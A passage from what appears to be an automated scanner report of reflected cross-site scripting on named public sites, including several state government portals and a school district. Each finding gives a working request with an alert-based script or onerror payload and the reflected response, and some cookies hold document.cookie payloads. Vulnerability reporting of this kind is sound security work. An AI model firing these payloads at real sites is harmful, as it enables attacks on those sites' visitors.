Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30330
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84381838%27%3E%3Ca%3E16be0a1a8e1%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<A title='This will display page with only the content which is best suited for printing.' HREF='/ctportal/cwp/view.asp?a=84381838'><a>16be0a1a8e1&q=431930&pp=12&n=1' border=false>
...[SNIP]...

3.94. http://www.ct.gov/ctportal/site/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/site/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f9f"><script>alert(1)</script>e7695281779 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ctportal/site/default.asp?d3f9f"><script>alert(1)</script>e7695281779=1 HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30625
Content-Type: text/html
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fctportal%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/site/default.asp?d3f9f"><script>alert(1)</script>e7695281779=1&ctportalNav=|27188|">
...[SNIP]...

3.95. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/taxonomy/taxonomy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d83"><script>alert(1)</script>6f12826e6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ctportal/taxonomy/taxonomy.asp?56d83"><script>alert(1)</script>6f12826e6b0=1 HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28086
Content-Type: text/html
Set-Cookie: ctportalPNavCtr%5FGID=; path=/ctportal
Set-Cookie: ctportalPNavCtr=; path=/ctportal
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&AA=False&LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/taxonomy/taxonomy.asp?56d83"><script>alert(1)</script>6f12826e6b0=1&ctportalNav=|27188|">
...[SNIP]...

3.96. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 769e9<script>alert(1)</script>f1110d4158c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education769e9<script>alert(1)</script>f1110d4158c/district/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=c840edd82e80bb1fc6d896bf4e8a22c7; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education769e9<script>alert(1)</script>f1110d4158c/district/district.php</div>
...[SNIP]...

3.97. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3626e<script>alert(1)</script>d8af3be9d26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district3626e<script>alert(1)</script>d8af3be9d26/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:53 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=885b169a70c688094ff307083c553ed4; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district3626e<script>alert(1)</script>d8af3be9d26/district.php</div>
...[SNIP]...

3.98. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a6ad<script>alert(1)</script>f2351919eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district/district.php5a6ad<script>alert(1)</script>f2351919eff HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=2c5421dba8c5188436ee5c8fdfde2216; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district/district.php5a6ad<script>alert(1)</script>f2351919eff</div>
...[SNIP]...

3.99. http://www.delmar.k12.de.us/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a4d7<script>alert(1)</script>8cd52fd3ee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7a4d7<script>alert(1)</script>8cd52fd3ee6 HTTP/1.1
Host: www.delmar.k12.de.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e7842bb204bff7ce048b9362b6fed952

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 15:09:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-encoding
Connection: close
Content-Type: text/html
Content-Length: 2797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.ico7a4d7<script>alert(1)</script>8cd52fd3ee6</div>
...[SNIP]...

3.100. http://www.georgia.gov/external/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 15fa3<script>alert(1)</script>1b342e50020 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1215fa3<script>alert(1)</script>1b342e50020 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:39:55 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=F468E5F01AD48C655A525E40BD4B07CE;Path=/
Set-Cookie: vgnvisitor=2w45tg008rU00001jrJqmY6Edd; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1227


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
</script>1b342e50020">http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1215fa3<script>alert(1)</script>1b342e50020</a>
...[SNIP]...

3.101. http://www.georgia.gov/external/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23c8f'%3balert(1)//5a4f221ee04 was submitted in the url parameter. This input was echoed as 23c8f';alert(1)//5a4f221ee04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1223c8f'%3balert(1)//5a4f221ee04 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:12 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=1A254C3FA89BB341E96C5F4021B385AE;Path=/
Set-Cookie: vgnvisitor=2w45tw0020Y00001jrJrRcBCM6; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1175


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
<script type="text/javascript">
location.replace('http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1223c8f';alert(1)//5a4f221ee04');
   </script>
...[SNIP]...

3.102. http://www.georgia.gov/external/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65df"><script>alert(1)</script>54c79dcd06 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12d65df"><script>alert(1)</script>54c79dcd06 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:32:38 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=941727D8F152A95C1EADB9D728309C3A;Path=/
Set-Cookie: vgnvisitor=2w45tM000ZY00001jrJoFGME3a; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1231


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
<meta http-equiv="refresh" content="0; URL=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12d65df"><script>alert(1)</script>54c79dcd06">
...[SNIP]...

3.103. http://www.healthynh.com/index-fhc.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthynh.com
Path:   /index-fhc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8336"><script>alert(1)</script>2bdf6318525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-fhc.php?b8336"><script>alert(1)</script>2bdf6318525=1 HTTP/1.1
Host: www.healthynh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:14 GMT
Server: L1c
Set-Cookie: PHPSESSID=a3e0be6f57b47037047e77111e497453; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17349

<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
   <title>Foundation for Healthy Communities</title>
   <link rel="stylesheet" href="/inc/default.css.phpi" type="
...[SNIP]...
<a href="/index-fhc.php?b8336"><script>alert(1)</script>2bdf6318525=1&printfriendly=yes" target="_blank">
...[SNIP]...

3.104. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e81c7*/alert(1)//4c687dfaa6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(1)//4c687dfaa6f=1 HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=C55D22317F997F3DE5A33917B985534E.ecom203_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:19 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1215348012@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:19 GMT
Server: ecom203
Connection: close
Content-Length: 38209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
'
   }
       return str.substring(str.lastIndexOf(slash) + 1, str.lastIndexOf('.'))
   }
   /* console.log('getRequestURI(): /gallery/lp/2010/visit_florida/vacation_photos.jsp');
   console.log('getQueryString(): e81c7*/alert(1)//4c687dfaa6f=1');
   console.log('pageName: null'); */
</script>
...[SNIP]...

3.105. http://www.ms.gov/ms_sub_template.jsp [Category_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ms.gov
Path:   /ms_sub_template.jsp

Issue detail

The value of the Category_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e740"><img%20src%3da%20onerror%3dalert(1)>a3b5706621b was submitted in the Category_ID parameter. This input was echoed as 6e740"><img src=a onerror=alert(1)>a3b5706621b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ms_sub_template.jsp?Category_ID=46e740"><img%20src%3da%20onerror%3dalert(1)>a3b5706621b HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000IR5EHNxWBpUhViAYMe_JD1G:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.1.10.1304126862

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 01:34:39 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A40B0FC60A0C1A16441A441A94429A94
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYZWQHtAYSklg01qYE0ZX2Lg7mlNPl70nzYjDbgcmgGlwN5cwgPMSSUR4pTaqrepuY13rHldvZD7gDNVAx04SG1D
Content-Length: 18892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html>
<head>
   <title> | The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="stylesheet
...[SNIP]...
<img src="images/hdr_46e740"><img src=a onerror=alert(1)>a3b5706621b.gif" width="253" height="21" border="0" alt="">
...[SNIP]...

3.106. http://www.nv.gov/workarea/csslib/ektronCss.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 6bd35<script>alert(1)</script>2680ccebefc was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronModalCss+EktronThickBoxCss+EktronBubbleCss6bd35<script>alert(1)</script>2680ccebefc HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/css; charset=utf-8
Expires: Sun, 29 Apr 2012 11:24:54 GMT
Last-Modified: Sat, 30 Apr 2011 11:24:54 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:53 GMT
Content-Length: 11064

.ektronWindow{display:none;position:fixed!important;top:25%;left:50%;margin-left:-20em;width:40em;background-color:#fff;color:#333;border:1px solid #525252;padding:1em;}.ektronModalOverlay{background-
...[SNIP]...
Area/images/application/macFFBgHack.gif') repeat;}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronBubbleCss6bd35<script>alert(1)</script>2680ccebefc */
/* path:
/* ############################################################# */


3.107. http://www.nv.gov/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload dee3d<script>alert(1)</script>8660aed3ca9 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJSdee3d<script>alert(1)</script>8660aed3ca9 HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: application/javascript; charset=utf-8
Expires: Sun, 29 Apr 2012 11:24:55 GMT
Last-Modified: Sat, 30 Apr 2011 11:24:55 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
